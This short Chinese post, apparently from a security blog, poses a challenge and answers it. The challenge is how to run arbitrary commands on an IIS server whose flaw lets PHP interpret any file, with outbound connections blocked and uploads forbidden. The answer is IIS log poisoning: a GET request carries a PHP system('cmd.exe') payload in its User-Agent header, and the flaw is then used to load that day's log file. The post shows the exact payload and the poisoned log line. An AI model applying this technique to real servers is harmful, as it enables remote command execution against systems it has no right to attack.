已知一个iis漏洞可以让php解释任意的给定文件。

挑战:

怎么执行任意命令?

应用环境:防火墙配置不准许对外连接。

要求:不能要求上传文件。


总算看到一次答案了:

http://www.inbreak.net/kxlzxtest/phpiis.txt

C:\Windows\System32\LogFiles\w3svcXXXX让php解析当天访问日志,然后用get请求提交user agent为 User-Agent: <?php system("cmd.exe");?>

于是当天日志加入了 2011-01-01 16:25:06 W3SVC1 10.247.186.114 GET /index.asp - 80 - xxxxxxxxxxxxxxxxxx <?php+system("cmd.exe");+?> 200 0 0 然后用漏洞加载这个文件即可

相关文章:

  • 2022-02-22
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-07-18
  • 2021-11-02
猜你喜欢
  • 2021-06-26
  • 2021-10-16
  • 2021-04-17
  • 2021-07-14
  • 2021-10-30
  • 2021-06-29
  • 2022-03-13
相关资源
相似解决方案